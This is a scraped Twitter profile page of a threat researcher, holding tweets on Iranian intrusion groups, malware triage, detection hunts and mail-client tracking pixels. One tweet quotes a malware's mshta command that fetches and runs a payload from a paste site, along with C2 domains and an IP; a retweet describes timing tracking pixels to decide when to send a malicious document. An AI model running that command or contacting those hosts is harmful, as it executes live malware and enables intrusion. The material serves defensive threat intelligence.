Nick Carr

@ItsReallyNick

Security person. Adversary tradecraft, threat research, incident response, and trolling at /. co-host:

Washington, DC
linkedin.com/in/nicholascar…
Vrijeme pridruživanja: rujan 2009.
1.583 fotografije ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @ItsReallyNick

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ItsReallyNick

  1. Prikvačeni tweet
    17. sij

    In response to increased U.S.-Iran tensions & concerns of retaliatory cyber attacks, Iranian intrusion experts & are on for the latest on all things Iran: & active UNC groups 🇮🇷👨‍💻🕵️‍♂️

    : Spotlight Iran - from Cain & Abel to full SANDSPY
    Prikaži ovu nit
    9 replies 40 proslijeđenih tweetova 92 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    3. velj

    Teamviewer has been storing user passwords encrypted with AES, not hashed, in the registry accessible to low privilege users on the machine. This works for versions dating back from at least as far back as 2012 to the latest version.

    9 replies 106 proslijeđenih tweetova 159 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    prije 21 sat

    IF you got yourself a shiny Windows 10 environment & wanna find some malwares running in an elevated context, run a historical sweep for ✔️parent process = “wsreset.exe” ✔️process = !”mmc.exe”,!”reg.exe”

    38 proslijeđenih tweetova 107 korisnika označava da im se sviđa
    Poništi
  4. proslijedio/la je Tweet
    17. sij

    - Stomps fakes VBA source - PCODE reveals a CobaltStrike stager - C2 in screenshots

    1 reply 8 proslijeđenih tweetova 8 korisnika označava da im se sviđa
    Poništi
  5. proslijedio/la je Tweet
    3. velj

    Like puzzles? Here's an obfuscated PHP webshell that should scratch that itch.

    6 replies 12 proslijeđenih tweetova 51 korisnik označava da mu se sviđa
    Poništi
  6. proslijedio/la je Tweet
    3. velj

    Getting DNS Client Cached Entries with CIM/WMI

    49 proslijeđenih tweetova 101 korisnik označava da mu se sviđa
    Poništi
  7. proslijedio/la je Tweet
    2. velj
    Odgovor korisniku/ci

    That's gotta be obnoxious as hell. Here you are trying to exfil documents for industrial espionage, and someone else just rolls up and encrypts it all for a cash grab. It's like the getaway driver for a bank heist getting carjacked while they're waiting.

    5 replies 18 proslijeđenih tweetova 78 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    29. sij

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

    13 replies 104 proslijeđena tweeta 248 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  9. 31. sij

    If you sorta liked the above, you'll LOVE this great new blog from showing legit sites used to host similarly-encoded from persona "robacopony147" 📰

    7 proslijeđenih tweetova 5 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  10. 31. sij

    bginfo.exe for cars

    0:31
    What unreleased FSD Autopilot sees. Straight from Tesla Autopilot recruiting website.
    12 proslijeđenih tweetova 46 korisnika označava da im se sviđa
    Poništi
  11. proslijedio/la je Tweet
    29. sij

    This is a GREAT technique for identifying devices and usage patterns of targets. Send at 8 AM, 9 AM, Noon ... opened on mobile. (Commute and lunch) Send between 10 and noon, opened on full device. Cool, now we know when to send the maldoc.😈

    We've all received emails with no attachment and assume it's "safe" to open in a mail client (as long as we don't explicitly click on any URLs). Right? Not so much...
    Prikaži ovu nit
    17 proslijeđenih tweetova 51 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    30. sij

    The other point here is that you should listen to ' tips on common patterns: If you see: *^*4D, *^*5A, *^*90, *^*00, ... You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE.

    17 proslijeđenih tweetova 38 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  13. 30. sij

    The other point here is that you should listen to ' tips on common patterns: If you see: *^*4D, *^*5A, *^*90, *^*00, ... You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE.

    17 proslijeđenih tweetova 38 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  14. 30. sij

    You should process these at scale and - outside of training - it's not a good use of time to step through them manually. 👨‍💻btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.

    1 reply 1 proslijeđeni tweet 8 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  15. 30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    57 proslijeđenih tweetova 154 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    29. sij
    Odgovor korisnicima i sljedećem broju korisnika:

    What % of malware uses non-TLS vs TLS for C2? Based on a (super biased) sample of ~10k binaries over 10 years I estimate it’s 90/10. Would love to see someone do a broader, less biased eval to see if it is on the rise (I don’t think it is)

    6 replies 41 proslijeđeni tweet 77 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    29. sij

    🇮🇷 has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.

    Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot party - it could also be someone less "friendly"
    Prikaži ovu nit
    45 proslijeđenih tweetova 113 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    30. sij

    We’re turning on a tool for key moments of the 2020 US election that enables people to report misleading information about how to participate in an election or other civic event.

    176 replies 465 proslijeđenih tweetova 648 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    28. sij

    We've all received emails with no attachment and assume it's "safe" to open in a mail client (as long as we don't explicitly click on any URLs). Right? Not so much...

    16 replies 224 proslijeđena tweeta 496 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet
    29. sij

    discovery of the day: you can apply structure offsets to a selection of code 🤯 select code range, press T, select your structure, be amazed

    24 proslijeđena tweeta 109 korisnika označava da im se sviđa
    Poništi
  21. 29. sij

    This thread contains a lot of info & examples of a highly-skilled red team that really wanted to know their UNC #.

    Here's a fresh one from the same intrusion operator: 💾"0X1F588277.doc" #⃣957e8d6aa08af8c5d82cc3f5f23d86a5 🔗 👿 & backdoors 🔃35.236.203.52/match 👨‍💻 (🟥 team) ^very worth your time to chase, they do cool stuff 🤩 I made a logo 😉🙃
    Prikaži ovu nit
    1 reply 5 proslijeđenih tweetova 33 korisnika označavaju da im se sviđa
    Poništi

@ItsReallyNick još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·